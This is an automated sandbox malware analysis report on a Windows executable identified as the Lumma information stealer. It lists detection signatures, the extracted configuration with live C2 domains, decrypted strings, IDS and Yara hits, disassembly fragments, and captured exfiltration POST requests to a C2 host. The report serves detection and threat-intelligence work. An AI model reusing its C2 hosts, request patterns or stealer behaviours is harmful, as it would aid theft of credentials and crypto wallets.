Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Launcher_x64.exe

Overview

General Information

Sample name:Launcher_x64.exe
Analysis ID:1579566
MD5:a467477e289901e8c45912f98fc56cd2
SHA1:15be8446db31a669ee930bedf992ef558b121f7f
SHA256:6a8a3c7873b18093245e953808bef419d56ba8d103eab96d276111ef59992c6f
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Launcher_x64.exe (PID: 2640 cmdline: "C:\Users\user\Desktop\Launcher_x64.exe" MD5: A467477E289901E8C45912F98FC56CD2)
    • conhost.exe (PID: 5244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Launcher_x64.exe (PID: 4420 cmdline: "C:\Users\user\Desktop\Launcher_x64.exe" MD5: A467477E289901E8C45912F98FC56CD2)
    • Launcher_x64.exe (PID: 3336 cmdline: "C:\Users\user\Desktop\Launcher_x64.exe" MD5: A467477E289901E8C45912F98FC56CD2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["sendypaster.xyz", "hosue-billowy.cyou", "smash-boiling.cyou", "pollution-raker.cyou", "ripe-blade.cyou", "greywe-snotty.cyou", "steppriflej.xyz", "supporse-comment.cyou", "bellflamre.click"], "Build id": "LPnhqo--swetamubcoyu"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000003.00000003.2556263712.0000000001093000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
        00000003.00000003.2602917926.0000000001093000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          00000003.00000002.2611002767.0000000001073000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            00000003.00000003.2555293768.0000000001093000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              00000003.00000003.2530628830.000000000103B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 5 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T01:17:36.641324+010020283713Unknown Traffic192.168.2.449730193.143.1.9443TCP
                2024-12-23T01:18:08.625788+010020283713Unknown Traffic192.168.2.449737193.143.1.9443TCP
                2024-12-23T01:18:11.813791+010020283713Unknown Traffic192.168.2.44976523.55.153.106443TCP
                2024-12-23T01:18:14.333543+010020283713Unknown Traffic192.168.2.449772172.67.157.254443TCP
                2024-12-23T01:18:16.240837+010020283713Unknown Traffic192.168.2.449777172.67.157.254443TCP
                2024-12-23T01:18:18.700426+010020283713Unknown Traffic192.168.2.449784172.67.157.254443TCP
                2024-12-23T01:18:21.007739+010020283713Unknown Traffic192.168.2.449790172.67.157.254443TCP
                2024-12-23T01:18:23.182176+010020283713Unknown Traffic192.168.2.449795172.67.157.254443TCP
                2024-12-23T01:18:25.967597+010020283713Unknown Traffic192.168.2.449801172.67.157.254443TCP
                2024-12-23T01:18:28.978081+010020283713Unknown Traffic192.168.2.449807172.67.157.254443TCP
                2024-12-23T01:18:32.629372+010020283713Unknown Traffic192.168.2.449818172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T01:18:14.989615+010020546531A Network Trojan was detected192.168.2.449772172.67.157.254443TCP
                2024-12-23T01:18:17.048776+010020546531A Network Trojan was detected192.168.2.449777172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T01:18:14.989615+010020498361A Network Trojan was detected192.168.2.449772172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T01:18:17.048776+010020498121A Network Trojan was detected192.168.2.449777172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T01:17:04.741497+010020582121Domain Observed Used for C2 Detected192.168.2.4619021.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T01:18:19.696798+010020480941Malware Command and Control Activity Detected192.168.2.449784172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T01:18:12.592732+010028586661Domain Observed Used for C2 Detected192.168.2.44976523.55.153.106443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000000.00000002.1731377519.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["sendypaster.xyz", "hosue-billowy.cyou", "smash-boiling.cyou", "pollution-raker.cyou", "ripe-blade.cyou", "greywe-snotty.cyou", "steppriflej.xyz", "supporse-comment.cyou", "bellflamre.click"], "Build id": "LPnhqo--swetamubcoyu"}
                Multi AV Scanner detection for submitted file
                Source: Launcher_x64.exeReversingLabs: Detection: 28%
                Machine Learning detection for sample
                Source: Launcher_x64.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: pollution-raker.cyou
                Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: hosue-billowy.cyou
                Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: ripe-blade.cyou
                Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: smash-boiling.cyou
                Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: supporse-comment.cyou
                Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: greywe-snotty.cyou
                Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: steppriflej.xyz
                Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sendypaster.xyz
                Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bellflamre.click
                Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: LPnhqo--swetamubcoyu
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004182BC CryptUnprotectData,3_2_004182BC
                Source: Launcher_x64.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49765 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49772 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49777 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49784 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49790 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49795 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49801 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49807 version: TLS 1.2
                Source: Launcher_x64.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D29126 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00D29126
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D29075 FindFirstFileExW,2_2_00D29075
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D29126 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00D29126
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 2DA07A80h3_2_0043E950
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_0042C911
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_0042C911
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 5E874B5Fh3_2_00426A70
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+06h]3_2_00437A30
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov ecx, eax3_2_0043C591
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov esi, edx3_2_004085B0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 71B3F069h3_2_0043E6C0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041B841
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then jmp eax3_2_00409ED1
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+edx+20B50FDAh]3_2_0042B801
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov ecx, eax3_2_0042B801
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then jmp eax3_2_0040A03B
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0042A940
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov esi, ecx3_2_00428950
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov ebx, dword ptr [esp+50h]3_2_00428950
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042E106
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov edi, eax3_2_0042E106
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov ebx, eax3_2_00405910
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov ebp, eax3_2_00405910
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C72EB52Eh3_2_0043B120
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-702EAD53h]3_2_00419930
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-702EAD53h]3_2_00419930
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]3_2_0043B930
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042E1EA
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov edi, eax3_2_0042E1EA
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042E246
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov edi, eax3_2_0042E246
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_0041524C
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-702EAD3Fh]3_2_0041524C
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-702EACABh]3_2_0041524C
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-77E1E040h]3_2_00409220
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042E234
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov edi, eax3_2_0042E234
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then add ecx, eax3_2_0042623D
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then jmp ecx3_2_0043D2D7
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], C7235EAFh3_2_0043EAF0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042D37F
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx+03h]3_2_00408B10
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebp+2434928Ch]3_2_00408B10
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then jmp ecx3_2_0043D3C3
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]3_2_00402B90
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov byte ptr [ebx], cl3_2_0042C393
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov edi, dword ptr [esp+24h]3_2_00429BA0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov dword ptr [esp+28h], 4E46404Eh3_2_00429BA0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_00407470
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_00407470
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then push edi3_2_0040CCCE
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then cmp dword ptr [esi+ebx*8], C50A68E6h3_2_0043ADC0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00416DCF
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-099F9BB6h]3_2_00413DE0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov edx, eax3_2_004225EF
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 4E935B1Fh3_2_004225EF
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then jmp eax3_2_004225EF
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-702EAD2Bh]3_2_00414DB4
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx-04F30F77h]3_2_0042E5B9
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov byte ptr [edx], cl3_2_0042E5B9
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx edx, word ptr [ebp+ecx+02h]3_2_00438E07
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx]3_2_0040A6C0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov ecx, edx3_2_0040A6C0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+2Ch]3_2_00426EE0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 5E874B5Fh3_2_00438680
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then cmp dword ptr [edx+ebx*8], BC9C9AFCh3_2_00438680
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then test eax, eax3_2_00438680
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]3_2_0041E6A0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+28h]3_2_00429EAE
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], E785F9BAh3_2_00429EAE
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov edi, edx3_2_0040C773
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then cmp al, 2Eh3_2_00426F00
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov word ptr [ebx], cx3_2_0041BF20
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041BF20
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]3_2_00421F20
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov ecx, edx3_2_0043CFC0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_004347D0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 4x nop then mov byte ptr [esp+ebx+000001A4h], al3_2_00409FB5

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2058212 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellflamre .click) : 192.168.2.4:61902 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49777 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49777 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49784 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49772 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49772 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49765 -> 23.55.153.106:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: sendypaster.xyz
                Source: Malware configuration extractorURLs: hosue-billowy.cyou
                Source: Malware configuration extractorURLs: smash-boiling.cyou
                Source: Malware configuration extractorURLs: pollution-raker.cyou
                Source: Malware configuration extractorURLs: ripe-blade.cyou
                Source: Malware configuration extractorURLs: greywe-snotty.cyou
                Source: Malware configuration extractorURLs: steppriflej.xyz
                Source: Malware configuration extractorURLs: supporse-comment.cyou
                Source: Malware configuration extractorURLs: bellflamre.click
                Performs DNS queries to domains with low reputation
                Source: DNS query: sendypaster.xyz
                Source: DNS query: steppriflej.xyz
                Source: Joe Sandbox ViewIP Address: 172.67.157.254 172.67.157.254
                Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                Source: Joe Sandbox ViewASN Name: BITWEB-ASRU BITWEB-ASRU
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 193.143.1.9:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49765 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49772 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 193.143.1.9:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49784 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49777 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49795 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49818 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49807 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49801 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49790 -> 172.67.157.254:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OMYEZFJQ2JXVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18134Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=49MCAZNGRSS936MHK3OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8797Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Q57AHR6AEG435T1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20426Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=X3DIBSUGUL5J3X9DJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1260Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=X0QYLC67LNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 564957Host: lev-tolstoi.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; 